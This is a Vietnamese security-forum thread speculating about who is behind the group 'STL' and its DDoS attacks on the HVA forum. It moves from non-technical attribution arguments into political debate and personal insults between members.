@xnohat : mình đồng ý với anh ở điểm " HVA là một mục tiêu quan trọng" +" HVA là nơi uy tin và hội tụ của các chuyên gia IT thực thụ " . bản thân các anh em chuyên gia IT của các tổ chức có tiếng trong nước cũng nhiều người là thành viên của HVA, nhưng mình thiết nghĩ nếu thực tế sảy ra một sự cố cho hạ tầng IT của Việtnam thì chắc chắn trước hết sẽ là nhiệm vụ của Vncert , C15 , BKIS ... chứ chắc khô sảy ra trường hợp. Chính quyền cần tới sự trợ giúp của các chuyên gia HVA trước ??? ( mặc dù thực tế các anh HVA có thể giúp sức giải quết ). từ điều này => là nếu thực chất muốn triệt phá hạ tầng cở sở IT và Uy tín của các chuyên gia IT trong nước thì danh sách ddos sẽ phải có Vncert , BKIS , .v.v. rồi mới tới HVA chứ ?
Thực tế, sau khi a TQN tiến hành phân tích và bước đầu vạch mặt đám Botnet của stl thì hva mới bị ddos. Điều đó có nghĩa là mục tiêu ddos hva có thể chỉ là sự trả thù, không muốn thông tin (server,phương thức hoạt động, che giấu...) của mạng botnet của họ bị quá nhiều người, tổ chức biết đến vì khi có nhiều người biết đương nhiên các AV cũng sẽ vào cuộc. Đồng thời cũng có ý đồ cảnh cáo cho a TQN để a không tiếp tục RCE số vr này nữa( điều này a TQN đã viết trước đây). Vì vậy theo mình nguyên nhân của việc hva bị ddos có thể không liên quan nhiều lắm đến mục đích phá hoại hạ tầng IT của VN.

@mylove14129 : mình thấy nhận xét này của anh mylove14129 ( Bkis) là một nhận xét sác đáng. Vậy thì có hai khả năng suy diễn như sau : a) anh TQN chắc hẳn đã biết rõ sự thật về đám STL này đến 75 % ( thậm trí đã từng có thời ...chén chú chén anh :|) -> ( iem thử làm thám tữ conan một chút, đúng sai thế nào mong anh TQN thông cảm ạ ). b) thực sự bọn STL này đang âm mưu một "lịch làm thịt" có tính toán và có tính chất chính trị và kinh tế ở tầm "Tàu khựa " ( suy luận của anh PXMMRF ) . sâu hơn root và rộng hơn cả internet ! từ a) và b) =? STL là ai . nhiều người đã rõ và cũng ngần ấy người don't know ! :|

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

Sống ở trên đời, chấp nhận (hoặc công nhận) một cái gì đó thuộc về mình bị sai (kể cả chọn lựa và niềm tin) là một điều rất khó. Con người càng nhiều dũng khí và càng nhiều sự tự tin thì càng dễ chấp nhận mình sai và ngược lại, càng ít dũng khí, càng thiếu tự tin thì càng khó. Người ta chỉ có thể chấp nhận mình sai khi sự thật đã quá hiển nhiên, không chối cãi được nhưng trước khi chấp nhận sự thật, họ luôn luôn dựa vào định kiến và niềm tin có sẵn để biện hộ. Ngay cả việc mua lầm một chiếc áo (giả hiệu) đi chăng nữa, con người ta không thoát khỏi quá trình cãi lý và biện bác rằng mình đã không mua lầm đồ. Cho đến khi hết đường cãi thì mới chuyển sang giai đoạn bực tức, giận dữ, thậm chí hụt hẫng. Chiếc áo cũng vậy, niềm tin cũng vậy... một khi nó thuộc về mình và do mình đã chọn lựa (một cách dễ dàng hoặc một cách cẩn thận) nhưng nó bị rơi vào chỗ "hàng dỏm" thì chẳng mấy ai dễ dàng chấp nhận mình đã lỡ chọn "đồ dỏm". Có một số bạn (có lẽ không nhiều) cho rằng tôi gán ghép sự việc là do các bạn sử dụng quá nhiều định kiến của mình để nhìn nhận vấn đề, đó là chưa kể đến khoảng khó chấp nhận "đồ dỏm" như tôi vừa nói ở trên. Hãy nhìn tổng quát hơn về những hoạt động của stl như sau: 1. stl xuất hiện từ 2009. 2. Từ 2009 đến nay, stl đã có bao nhiêu là shared hosts, dedicated servers, shell accounts, domain names? 3. Từ 2009 đến nay, stl đã tốn bao nhiêu ngàn giờ đồng hồ và công sức cho những cuộc đánh phá? 4. Từ 2009 đến nay, đối tượng stl đánh phá là những ai? 5. Tại sao tất cả những thông tin bề nổi lẫn mặt chìm (emails bị lộ) của stl hoàn toàn dùng tiếng Việt? 6. Hãy xem những thông điệp deface và những thông điệp khác từ trước đến giờ mà stl tung ra đó là loại tiếng Việt của người Việt hay tiếng Việt của người nước ngoài? 7. Tại sao hàng loạt những dấu tích của stl đi ngược về Việt Nam (có cả những IP của một số công ty)? 8. Tại sao zombies được tạo ra để tấn công các trang web của người Việt có 99% nguồn là từ IP của Việt Nam? 9. Nếu stl là tổ chức nước ngoài và đang sử dụng tài sản của người Việt để đánh phá tàn sản của người Việt, tại sao tất cả các cơ quan chức năng đều im lặng? Các cơ quan chức năng bất lực? Hay sợ hãi? Hay họ không nghe, không biết? (tôi e rằng mỗi ngày, mỗi tuần HVA có không ít các cá nhân của các cơ quan chức năng viếng thăm). 10. Tại sao chính vietnamnet cũng không nói thật về mức độ thiệt hại của những trận tấn công? Hãy đọc kỹ lại các thảo luận có liên quan đến stl trên diễn đàn này và tập trung vào những thông tin thuần tuý kỹ thuật để tìm ra câu trả lời cho 10 câu hỏi trên và tự mình đưa ra nhận định cuối. Đừng nghe lời ai "gán ghép" và cũng đừng tìm cách bào chữa vì những câu "gán ghép". Phụ lục: stl có ít nhất là 3 nhóm chuyên 3 công tác khác nhau: - Nhóm 1: chuyên lo tạo và tái tạo malware. Nhóm này lân la rất nhiều những nơi thảo luận và phá tán malware (cũ và mới). 80% malware của stl là dùng các thư viện có sẵn, phần còn lại có thể dùng lại những thứ đã được dùng ở đâu đó, có thể được xào nấu và cải tiến qua thời gian (hãy xem biến thái từ thời vecebot đến nay thì rõ). Trong nhóm này, có 2 phần đặc thù: malware để ddos và malware để đánh cắp thông tin. - Nhóm 2: chuyên công tác deface và thu thập thông tin cá nhân. Thông tin thu thập được sẽ được phân loại và chọn lựa ra từng nhóm đối tượng và từng đối tượng để "xử lý" cụ thể. Nhóm này chuyên lùng các bugs phổ biến trên các loại blogs, forum, cms... để tấn công. Họ dùng "shells" có sẵn và xài nấu thêm chút đỉnh để làm khó những ai có ý định tìm hiểu hoặc truy lùng. Các đối tượng bị tấn công có thể bị deface hoặc có thể giữ nguyên trạng để đánh lừa dư luận. - Nhóm 3: chuyên phát tán malware và "thu hoạch" nạn nhân. Nhóm này có thể gởi mass emails ra hoặc từng cá nhân hoặc dàn dựng cơ sở để lây lan với quy mô lớn. Nhóm này có thể kèm theo công tác (và có sự giúp đỡ của các nhóm kia) với công tác nguỵ tạo trang web, nguỵ tạo blogs và gây nhiễu, gây ngờ vực trong cộng đồng mạng. Nhóm này nặng về phía "công tác tư tưởng" và ít kỹ thuật hơn. PS: Nếu tớ là stl của TQ, tớ dùng cơ sở hạng tầng ở Mỹ, Nga, Ukraine và Châu Âu, thậm chí cả cơ sở hạng tầng ở TQ và hoàn toàn trao đổi nhau bằng tiếng Anh hoặc tiếng Pháp để đánh lừa dư luận. Chỉ có điều, nếu tớ là stl của TQ thì tớ không hơi đâu đi đánh phá mấy cái blogs trên mạng.

Phân tích tính chất vài trận DDoS HVA vừa qua.

mylove14129 — GMT

@all : vấn đề liên quan đến chính trị bao giờ cũng phức tạp. Những thứ chúng ta nhìn thấy, tưởng rõ ràng rồi nhưng thực tế có khi lại không phải như vậy. Tôi thích anh A không có nghĩa là tôi không dò xét anh ấy, tôi ghét anh B không có nghĩa là tôi lúc nào cũng phải tỏ ra thù ghét B. Còn rất nhiều vấn đề (kinh tế , chính trị,...) mà tôi còn phải phụ thuộc cả vào A và B. Nên : mọi thứ chỉ là phỏng đoán, phân tích kỹ thuật sẽ khó mà tìm ra được đích danh cá nhân hoặc tổ chức nào đứng sau stl. Trên hva hiện tại đang có ít nhất 2 luồng quan điểm về việc stl là ai ?, ai là tc đứng sau stl? Ai cũng có lý lẽ để tin tưởng vào quan điểm của mình. Theo mình nên tập trung vào những vấn đề kỹ thuật nhiều hơn và "hạn chế" bàn luận về vấn đề khác vì mọi thứ đều chưa rõ ràng @kutruoi : mình không phải là người BKIS. Chỉ là một người thích tìm hiểu về CNTT không hơn không kém :)

Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale — GMT

mylove14129 wrote:

@all : vấn đề liên quan đến chính trị bao giờ cũng phức tạp. Những thứ chúng ta nhìn thấy, tưởng rõ ràng rồi nhưng thực tế có khi lại không phải như vậy. Tôi thích anh A không có nghĩa là tôi không dò xét anh ấy, tôi ghét anh B không có nghĩa là tôi lúc nào cũng phải tỏ ra thù ghét B. Còn rất nhiều vấn đề (kinh tế , chính trị,...) mà tôi còn phải phụ thuộc cả vào A và B. Nên : mọi thứ chỉ là phỏng đoán, phân tích kỹ thuật sẽ khó mà tìm ra được đích danh cá nhân hoặc tổ chức nào đứng sau stl. Trên hva hiện tại đang có ít nhất 2 luồng quan điểm về việc stl là ai ?, ai là tc đứng sau stl? Ai cũng có lý lẽ để tin tưởng vào quan điểm của mình. Theo mình nên tập trung vào những vấn đề kỹ thuật nhiều hơn và "hạn chế" bàn luận về vấn đề khác vì mọi thứ đều chưa rõ ràng @kutruoi : mình không phải là người BKIS. Chỉ là một người thích tìm hiểu về CNTT không hơn không kém :)

Nếu mọi thứ đã rõ ràng thì còn gì để mà bàn? :-) . "Bàn" ở đây là thảo luận và nêu ra ý kiến cá nhân để đưa vấn đề đến một điểm nào đó. Nếu sự thể đã rõ thì chỉ còn là chuyện tán kháo (theo kiểu tán sau khi đọc báo) vậy thôi. Kỹ thuật luôn luôn nằm trong mọi khía cạnh của đời sống, kể cả chính trị, văn hoá, văn chương, ngôn ngữ, kỹ thuật.... Bản thân chính trị không có gì xấu hoặc sai hoặc "nhạy cảm" mà chỉ có chính người đối diện nó có cảm nhận như vậy. Thật ra, chính trị là một môn (một ngành khoa học) và chính trị chẳng phải là thứ "bẩn thỉu" hay "nhạy cảm" hay "phức tạp" như nhiều người cảm nhận. "Sạch" hay "bẩn", "thật" hay "giả", "tốt" hay "xấu" là do cảm nhận và cách nhìn của từng cá nhân. Nếu "chính trị" được dùng như một thứ công cụ để làm những việc tốt thì nó tốt, thật thì nó thật, dối thì nó dối, bẩn thì nó bẩn. Trong đời sống bình thường, ngay cả câu nói "lựa lời mà nói cho vừa lòng nhau" cũng là một dạng "chính trị" rồi. Hành động "lựa lời" này hàm chứa sự thật hay giả dối là do người nói ra nó và do người nghe được nó. Tính chất của hành động "lựa lời" vẫn là chính trị. Nói về khía cạnh "chính trị" trong vấn đề HVA (và những trang web khác) bị tấn công, "chính trị" là cốt lõi cũng như là động lực cho việc tấn công. Nói khác hơn, nếu không có động lực thì tình trạng này đã không xảy ra và nếu chỉ xét mỗi khía cạnh "kỹ thuật" thì chỉ mới có xét đến phương tiện thực thi động lực (hiện tượng) chớ chưa hề đụng tới khía cạnh động lực (bản chất). Muốn đi đến tận cùng của vấn đề thì nên đi đến bản chất của nó thay vì tránh né vì lý do "nhạy cảm" nào đó, đặc biệt đối với những người làm việc có liên quan đến khoa học.

Phân tích tính chất vài trận DDoS HVA vừa qua.

kutruoi — GMT

conmale wrote:

mylove14129 wrote:

@all : vấn đề liên quan đến chính trị bao giờ cũng phức tạp. Những thứ chúng ta nhìn thấy, tưởng rõ ràng rồi nhưng thực tế có khi lại không phải như vậy. Tôi thích anh A không có nghĩa là tôi không dò xét anh ấy, tôi ghét anh B không có nghĩa là tôi lúc nào cũng phải tỏ ra thù ghét B. Còn rất nhiều vấn đề (kinh tế , chính trị,...) mà tôi còn phải phụ thuộc cả vào A và B. Nên : mọi thứ chỉ là phỏng đoán, phân tích kỹ thuật sẽ khó mà tìm ra được đích danh cá nhân hoặc tổ chức nào đứng sau stl. Trên hva hiện tại đang có ít nhất 2 luồng quan điểm về việc stl là ai ?, ai là tc đứng sau stl? Ai cũng có lý lẽ để tin tưởng vào quan điểm của mình. Theo mình nên tập trung vào những vấn đề kỹ thuật nhiều hơn và "hạn chế" bàn luận về vấn đề khác vì mọi thứ đều chưa rõ ràng @kutruoi : mình không phải là người BKIS. Chỉ là một người thích tìm hiểu về CNTT không hơn không kém :)
Nếu mọi thứ đã rõ ràng thì còn gì để mà bàn? :-) . "Bàn" ở đây là thảo luận và nêu ra ý kiến cá nhân để đưa vấn đề đến một điểm nào đó. Nếu sự thể đã rõ thì chỉ còn là chuyện tán kháo (theo kiểu tán sau khi đọc báo) vậy thôi. Kỹ thuật luôn luôn nằm trong mọi khía cạnh của đời sống, kể cả chính trị, văn hoá, văn chương, ngôn ngữ, kỹ thuật.... Bản thân chính trị không có gì xấu hoặc sai hoặc "nhạy cảm" mà chỉ có chính người đối diện nó có cảm nhận như vậy. Thật ra, chính trị là một môn (một ngành khoa học) và chính trị chẳng phải là thứ "bẩn thỉu" hay "nhạy cảm" hay "phức tạp" như nhiều người cảm nhận. "Sạch" hay "bẩn", "thật" hay "giả", "tốt" hay "xấu" là do cảm nhận và cách nhìn của từng cá nhân. Nếu "chính trị" được dùng như một thứ công cụ để làm những việc tốt thì nó tốt, thật thì nó thật, dối thì nó dối, bẩn thì nó bẩn. Trong đời sống bình thường, ngay cả câu nói "lựa lời mà nói cho vừa lòng nhau" cũng là một dạng "chính trị" rồi. Hành động "lựa lời" này hàm chứa sự thật hay giả dối là do người nói ra nó và do người nghe được nó. Tính chất của hành động "lựa lời" vẫn là chính trị. Nói về khía cạnh "chính trị" trong vấn đề HVA (và những trang web khác) bị tấn công, "chính trị" là cốt lõi cũng như là động lực cho việc tấn công. Nói khác hơn, nếu không có động lực thì tình trạng này đã không xảy ra và nếu chỉ xét mỗi khía cạnh "kỹ thuật" thì chỉ mới có xét đến phương tiện thực thi động lực (hiện tượng) chớ chưa hề đụng tới khía cạnh động lực (bản chất). Muốn đi đến tận cùng của vấn đề thì nên đi đến bản chất của nó thay vì tránh né vì lý do "nhạy cảm" nào đó, đặc biệt đối với những người làm việc có liên quan đến khoa học.

@conmale : em hoàn toàn có chung quan điểm với anh về vấn đề này; và hoàn toàn bị anh thuyết phục bởi tính rõ ràng, mạch lạc của vấn đề, và tính cụ thể không lập lờ về quan điểm trong ý kiến anh vừa đưa ra trên đây. nhiều người vì điều này điều khác hoặc vì khả năng của chính họ. họ chỉ mãi sống như một điều gì đó không rõ ràng. trong làm ăn kinh doanh họ có khái niệm " grey business ", trong kỹ thuật họ có " đi tắt đón đầu, nắm bắt công nghệ ", trong thế giới hacker họ có "mũ nâu ",trong chính trị họ có " phát triển kinh tế thị trường THEO đường lối xã hội chủ nghĩa ", trong quan điểm tôn giáo họ " vô thần NHƯNG vái lạy gốc đa, gốc đề, xem bói, hoá vàng buôn thần bán thánh, gọi vong, nói chuyện với người cõi âm, tìm hài cốt liệt sỹ " lợn" ( vì toàn tìm ra xương động vật thôi mà " . ...chết thật ! một xã hội hư vô và lập lờ. nơi mà con người chẳng biết họ là chính ai . =)) & :-( vì =((

Phân tích tính chất vài trận DDoS HVA vừa qua.

PXMMRF — GMT

Trong trao đổi kỹ thuật IT và qua đó dự đoán danh tính và đông cơ của những kẻ can dư vào các hành vị phạm tội (như STL) ta cần bình tĩnh, khách quan và tôn trọng ý kiến lẫn nhau. Như thế mới vui, thích thú và bổ ích. Riêng bạn kutruoi, tôi có ý kiến như sau: Chúng ta không nên có thái độ cưc đoan, chẳng bàn về kỹ thuật gì, chỉ chăm chăm tìm cơ hôi để nói xấu nhà nước, chế độ. Tôi không bênh chế độ, nhưng chuyện nào ra chuyện đó. Không nên lợi dụng một kẽ hở nào đó để nói ra các bực tức vô cớ của mình. Thí dụ : Bạn viết "Đi tắt đón đầu, đón bắt công nghệ" (câu này bạn viết ẩu, không hết ý, phải viết rõ là công nghệ gì chứ?) hoàn toàn không phải là chuyện sai. Nước Nhật cũng đã làm như vậy sau chiến tranh thế giới thứ hai, nên họ mới đuổi kịp Mỹ. Về công nghệ, theo tôi, hiện nay họ vẫn đứng ở mức tiên tiến, chỉ kém Mỹ ở một vài lĩnh vưc. TQ chưa thể so sánh với họ được. Vấn đề chỉ là đi tắt đón đầu nắm bắt công nghệ cao, tiên tiến theo cách nào cho đúng mà thôi. Thứ hai là tại sao bạn lại có thể viết câu này: "tìm hài cốt liệt sỹ " lợn" ( vì toàn tìm ra xương động vật thôi mà " . ...chết thật ! một xã hội hư vô và lập lờ. nơi mà con người chẳng biết họ là chính ai." Bạn đang sống ở VN hay ở Mỹ?. Sau chiến tranh, có rất nhiều cựu chiến binh VN, bỏ ra rất nhiều tiền bạc, thời gian, công sức của mình ra để tìm hài cốt đồng đội. Với họ "Nghĩa tử là nghĩa tận". Họ muốn tìm lai những vết tích còn lai của những người đã cùng mình chiến đấu, cùng vui buồn có nhau, cùng chia nắm cơm nguôi trước giờ khai chiến, đắp chung một tấm chăn rách. Họ làm như vậy không vì một chế độ, một lý tưởng cao xa nào cả, cũng không làm để lâp công, thăng chức, vì họ đã về hưu, giải ngũ từ lâu rồi. Họ làm vì tình người, vì một tình cảm thiêng liêng giữa những người luôn phải đối mặt với cái chết, cái mất mát xé lòng. Vì vậy nói những người ấy chỉ đi tìm xương lợn chứ không phải là hài cốt của đồng đôi chẳng những là đã thoá mạ họ một cách tàn ác và ngu suẩn, mà còn thiếu hẳn đi một tấm lòng của con người nhân hậu. Việt nam cũng tham gia tìm hài cốt của lính Mỹ chết trong chiến tranh. Tôi nghĩ đó là việc cần thiết và nhân đạo. Hài cốt của lính Mỹ cũng cần được trân trong như hài cốt của bộ đội VN. Vì bản tính của người Việt là "Nghĩa tử là nghĩa tận".

Phân tích tính chất vài trận DDoS HVA vừa qua.

maclaren — GMT

2 hôm nay tập trung đọc cho hết topic này !. theo tôi hiểu Gần như những ai quan tâm đến chủ đề này chắc cũng nắm được bao nhiêu % về STL rồi. Bản thân mọi người đều đã hiểu. Nhưng ai sẽ là người giám chỉ đích danh họ ra ?.

Phân tích tính chất vài trận DDoS HVA vừa qua.

Sherlockok — GMT

kutruoi wrote:

@conmale : em hoàn toàn có chung quan điểm với anh về vấn đề này; và hoàn toàn bị anh thuyết phục bởi tính rõ ràng, mạch lạc của vấn đề, và tính cụ thể không lập lờ về quan điểm trong ý kiến anh vừa đưa ra trên đây. nhiều người vì điều này điều khác hoặc vì khả năng của chính họ. họ chỉ mãi sống như một điều gì đó không rõ ràng. trong làm ăn kinh doanh họ có khái niệm " grey business ", trong kỹ thuật họ có " đi tắt đón đầu, nắm bắt công nghệ ", trong thế giới hacker họ có "mũ nâu ",trong chính trị họ có " phát triển kinh tế thị trường THEO đường lối xã hội chủ nghĩa ", trong quan điểm tôn giáo họ " vô thần NHƯNG vái lạy gốc đa, gốc đề, xem bói, hoá vàng buôn thần bán thánh, gọi vong, nói chuyện với người cõi âm, tìm hài cốt liệt sỹ " lợn" ( vì toàn tìm ra xương động vật thôi mà " . ...chết thật ! một xã hội hư vô và lập lờ. nơi mà con người chẳng biết họ là chính ai . =)) & :-( vì =((

Mình nghĩ kutruoi đã viết ẩu câu mình tô đỏ ở trên. Đáng lẽ viết : gọi vong, nói chuyện với cõi âm ĐỂ tìm hài cốt liệt sĩ thì kutruoi lại viết đánh dấu phẩy dẫn đến hiểu lầm. Qua những phân tích, chứng cớ anh Conmale nêu ra mình cũng tin STL không có liên quan đến nước ngoài. Những hướng khác không có dẫn chứng, bằng chứng giá trị.

Phân tích tính chất vài trận DDoS HVA vừa qua.

nvhbk16k53 — GMT

@Kutruoi: Xin hỏi bạn có phải là người Việt Nam không? Bạn suy nghĩ "vấn đề" như thế có được coi là "rõ ràng" và "mạch lạc" chưa? Hay bản thân bạn chỉ biết nói này nói nọ, tát nước theo mưa. Và ngay cả những gì bạn nói ở trên tôi cũng chả thấy cái gì gọi là "rõ ràng" và "mạch lạc" cả, hay bạn đang nói chính mình à?

Phân tích tính chất vài trận DDoS HVA vừa qua.

kutruoi — GMT

@PXMMFX : em xin nhận lỗi với anh vụ viết ẩu. quả thật em viết ẩu và không rõ nghĩa làm mọi người đọc hoặc hiểu lầm hoặc khôg hiểu em viết gì . a) ý em lên án và phê phán vụ " đi tắt đón đầu .v.v.v trong công nghệ " hay gì đó và liệt kê ra những ý tưởng nửa vời và khá nhập nhằng trong thực tế cuộc sống, và xã hội của nước mình như việc họ muốn nhanh chóng giầu có nhưng ưa thích grey business. họ thích làm người tốt trong tình huống này và làm người xấu trong tình huống kia trong ví dụ " mũ nâu" . họ muốn bắt STL bằng phân tích code, tracking clues rồi thế này thế kia. nhưng khi anh conmale hay ai dó đem ra bản cái " bản ngã " " bản chất của vấn đề" thì họ lại lao vào sô xổ nói này kia nọ khác ý là . không nên miên man mà phải tập trung cao vào phân tích kỹ thuật ???? đấy cũng là một thái độ ham hố hiểu biết , hoặc " chờ xem " con mồi phân tích đến đâu và thế nào một cách hồ đồ và nửa vời mà thôi. b) em thực sự không có ý gì tới các vong hồn các liệt sỹ đã hy sinh. mà ý muốn lên án thói nhảm nhí của một số người mồm hô hoán Marxism và tay vẫn lăm lăm dâng hoa lễ cúng bái abc bờ cờ .v.v. c) em vừa rời USA về việt nam ở rồi . các bác thông cảm nha.

Phân tích tính chất vài trận DDoS HVA vừa qua.

xsecure — GMT

trước mặt mình là kẻ thù.(trong chiến tranh)bạn cho mình là chính nghĩa cònđối diện là kẽ thù. và ngược lại họ cũng thế. hết chiến tranh(lúc mà tôi đã hiểu được 1 phần thế nào là hoà bình).mọi người vẫn sống hoà thuận với nhau.không ai nghĩ "pa của bạn mình là địch còn pa mình là bộ đội" hoặc ngược lại.bản chất con người việt nam là đôn hậu,thích hoà bình.(thậm chí sợ chiến tranh.theo ý nghĩ riêng tớ) @ kutruoi :

kutruoi wrote:

trong quan điểm tôn giáo họ " vô thần NHƯNG vái lạy gốc đa, gốc đề, xem bói, hoá vàng buôn thần bán thánh, gọi vong, nói chuyện với người cõi âm, tìm hài cốt liệt sỹ " lợn" ( vì toàn tìm ra xương động vật thôi mà " . ...chết thật ! một xã hội hư vô và lập lờ. nơi mà con người chẳng biết họ là chính ai . & vì

bạn có vơ đũa cả nắm không khi nói như vậy?hay cái youtube cho bạn ý nghĩ đó?phiến diện,thiếu thực tế.một số người bán rẽ lương tâm,bạn cũng đang bán rẽ thứ mà chúng ta ta ngồi lại với nhau,nói chuyện với nhau đó là người việt và tiếng việt.bên phải hay trái nếu đứng trước gương bạn đưa tay trái ?nhận định rõ ràng là nhận định cần có sự suy xét về ngữ và nghĩa cảnh. ps: viết xong mới thấy đoạn này:

kutruoi wrote:

c) em vừa rời USA về việt nam ở rồi . các bác thông cảm nha.

bạn là người thiểu năng.ít nhất với tôi là bạn không hoặc lười suy nghĩ

Phân tích tính chất vài trận DDoS HVA vừa qua.

kutruoi — GMT

@xsecure : he he he sorry ku xsecure nha . tớ vừa ở Mỹ về nên hơi thẳng thắn ... " bán rẽ " là thanh hó à ?? he he he . bán rẻ . viết cho nó rõ ra nào. quả thật tớ bán rẻ một vài " thứ ", nhưng chắc hẳn không phải bán rẻ điều mà chúng ta đang ngồi lại với nhau. tôi cũng thường xuyên đứng trước gương và đưa hai tay lên trời cầu khẩn cho thanh hoá nói " rỏ " giữa dấu ngã ~ và dấu (?) . vâng tôi là người thiểu năng và trung thực còn bạn có khả năng suy nghĩ, nhưng những điều bạn nghĩ bạn làm tôi thương bạn hơn, vì nó tăm tối và u mê quá cơ ;;) . bạn có ý gì không khi để một người thiểu năng như tôi phải thương cảm mình như vậy ? liệu bao lâu thì dấu ngả và hõi sẽ về tới chuẫn mực đây ? :P

Phân tích tính chất vài trận DDoS HVA vừa qua.

thuypv — GMT

@kutruoi em nói thật cái trang http://danlambaovn.blogspot.com em vào đọc quá nhiều rồi, từ khi HVA phân tích các vụ DDos nhằm vào nó Em đọc rất nhiều bài ở đó, em thấy chả có gì hay, hầu như bài nào em cũng đọc, để em xem nó có cái nhìn mới ko, có cái nhìn từ đa góc cạnh ko, nhưng em chả thấy, đọc hoài đâm chán, cái gì đúng cái gì sai, thì mình bít chứ, mình có phải là con nít đâu mà không cảm nhận được Bác nói vụ tìm mộ thì bác hơi bị sai rồi đấy, có 1 vài người buôn thần bán thánh làm ăn bất chính thì ko nói, còn những người chân chính thì sao, họ cũng tìm ra được cả ngàn cái mộ, sét nghiệm ADN sao đúng vậy mặc dù vậy họ chưa vào chiến trường bao giờ, cho bác 1 khoảng đất em đố bác chỉ được chỗ nào dưới 5 mét có hài cố đấy bác chỉ đi Trong xã hội luôn tồn tại cái trắng và cái đen, nhiều khi ta phải biết chấp nhận, và tìm ra hướng khắc phục Em theo dõi cái chủ đề này cũng lâu, theo em nghĩ STL lại là 1 thế lực muốn lật đổ đảng cộng sản, chúng giả mạo kiểu 1 phe theo chủ nghĩa CS sau đó uýnh lung tung các trang chống đối, tạo nên sự nghi ngờ trong cộng đồng, ... cố tình bôi xấu, để tất cả mọi người đều thấy nhà nước thật là xấu xa, ...sau đó tạo bất ổn xã hội và lật đổ chế độ Đó là suy nghĩ riêng cá nhân em, mong các bác lượng thứ

Phân tích tính chất vài trận DDoS HVA vừa qua.

xsecure — GMT

tôi chẵng theo bất kỳ chủ nghĩa nào ngoài chủ nghĩa cá nhân.và thậm chí là vô thần.(nhưng có đạo đức).tôi không cãi bạn về "rỏ hay rõ"và tôi cũng chãng thèm đoán bạn ở đâu mặc dù có thể."và xã hội của nước mình như việc họ muốn nhanh chóng giầu có nhưng ưa thích grey business. " bạn đã tự nói mình ở đâu. bạn gọi mình bằng "ku" điều đó chúng tỏ bạn khá thiểu năng.(thiểu năng là mất đi 1 hoặc nhiều chức năng nào đó) tôi đã từng nói phải hay trái vẫn là 2 mặt của 1 tờ giấy. ps: đọc lại bài muốn chửi ghê.việt nam lắm chổ nói và viết không đúng.ví dụ : "l" và "n", "tr" và ch", "y" và "i".... gần như tất cả các tỉnh thành đều có sai.(1 thằng người việt thiểu năng hết biết chổ nói). kết thúc,chúng ta không nên cãi nhau mà hãy để mọi người nhận xét ai sai chổ nào và đi vào vấn đề chính thì hơn.

Phân tích tính chất vài trận DDoS HVA vừa qua.

kutruoi — GMT

xsecure wrote:

tôi chẵng theo bất kỳ chủ nghĩa nào ngoài chủ nghĩa cá nhân.và thậm chí là vô thần.(nhưng có đạo đức).tôi không cãi bạn vầ "rỏ hay rõ"và tôi cũng chãng thèm đoán bạn ở đâu mặc dù có thể."và xã hội của nước mình như việc họ muốn nhanh chóng giầu có nhưng ưa thích grey business. " bạn đã tự nói mình ở đâu. bạn gọi mình bằng "ku" điều đó chúng tỏ bạn khá thiểu năng.(thiểu năng là mất đi 1 hoặc nhiều chức năng nào đó) tôi đã từng nói phải hay trái vẫn là 2 mặt của 1 tờ giấy.

@thuypv : cảm ơn bạn đã đọc và cho nhận xét. bạn không thấy hay vì bạn không cảm nhận được cái đời trong đó. tôi cảm thấy hay vì thay vì tôi chăm chăm vào chăm lo kiếm tiền nuôi riêng thân tôi và gia đình tôi, thì tôi lại đi viết báo, viết về những điều mắt thấy tai nghe và những thở than của con người mọi miền của nước mình .v.v. tôi vẫn tin bạn đầy đủ chức năng, và có một tâm hồn và tinh thần minh mẫn để một ngày kia bạn sẽ thấy ánh sáng của chân lý nơi bình bình : -:|- @xsecure : tặng ku bài thơ này ! ( iêu quá cơ ) tội nghiệp anh tôi, buồn mất thôi bao năm, bao tháng đã qua rồi. mà sao thanh hó còn nguyên giọng. khiến thiểu năng tôi ...nuốt ứ trôi ? + Thiểu năng trí tuệ vẫn là tôi xsecure đó đã mù rồi mù đôi mắt chính, nhìn sự thật mù cả tâm hồn , chết mất thôi ... :|

Phân tích tính chất vài trận DDoS HVA vừa qua.

thuypv — GMT

Tôi ví dụ cho bạn 1 bài viết trong đó thôi "Bức ảnh đồng phục và bài diễn văn" đó cái bài đó, nếu bạn có cái tầm nhìn và sự hiểu biết nhất định cuộc sống là bạn có thể thấy cái thằng tác giả đúng là có vấn đề về tâm lý nặng, hoặc 1 thằng dở hơi, có 1 cái bức ảnh thôi, mà nó ngồi suy luận ra đủ thứ, với cái tầm nhìn và cái đầu suy nghĩ bệnh hoạn thế thì cả đời nó chỉ là Mõ mà thôi, mà cái thằng MÕ sưa nay thì rõ lắm chuyện, bé xé thành to, ... tôi đọc rất nhiều bài trong đó, chỉ mong chờ có 1 bài nào đó thể hiện được cái tầm nhìn, cái tư duy vượt lên, ngoài bôi xấu và chỉ trích ra thì chả thấy có cái gì khác chán Thôi bỏ qua mấy cái này đi, anh em tập trung vào chủ đề chính vậy, em vẫn theo dõi thường xuyên Em vẫn bảo lưu quan điểm là STL là 1 thế lực chống đối đảng CS, chúng tạo sự nghi ngờ và làm mất niềm tin từ giới tri thức và giới trẻ với nhà nước, bằng cách giả vờ theo phe nhà nước, chúng biết trong nhà nước vẫn còn rất nhiều người trình độ thấp, vẫn có cái suy nghĩ cổ hủ và lạc hậu đó là quản lý và cấm đoán, tức là năng lực yếu cái này thì ai cũng biết, sau đó chúng tập trung uýnh vào các trang chống đối, vì chúng đều biết rằng ddos rồi cũng sẽ phục hồi dữ liệu lại được, ddos 1 thời gian thì thôi, mục đích thứ 2 đó là: tạo sự nghi ngờ của dân ta với khựa, tưởng khựa nó uýnh ta mà nhà nước ko giám lên tiếng, để thấy mấy ông lãnh đạo thật là hèn nhát, và bất tài, là tay sai cho khựa, ....(thực tế thì 2 thằng bình đẳng, chả thằng nào làm tay sai cho thằng nào cả), tạo sự thù hận và tự tôn dân tộc lên cao, bên khựa chúng cũng làm thế, khi đó 2 đất nước uýnh nhau => loạn, chúng ở giữa trục lợi Ngoài con đường đó ra, thì các thế lực muốn lật đổ đảng cs ko còn cách nào khác, hoạt động giống mấy ông VNCH ở mỹ như ngày xưa ư, xưa cũ và ko còn phù hợp nữa rồi, hoạt động như việt tân ư, cũng ko có tác dụng nốt, cộng sản họ đã bóp chết từ trong chứng nước rồi, chỉ còn 1 cách mượn khựa làm đối trọng đồng thời gây mất niềm tin và nghi ngờ từ trong dân chúng đặc biết là giới trẻ và giới trí thức, ...

Phân tích tính chất vài trận DDoS HVA vừa qua.

rongchaua — GMT

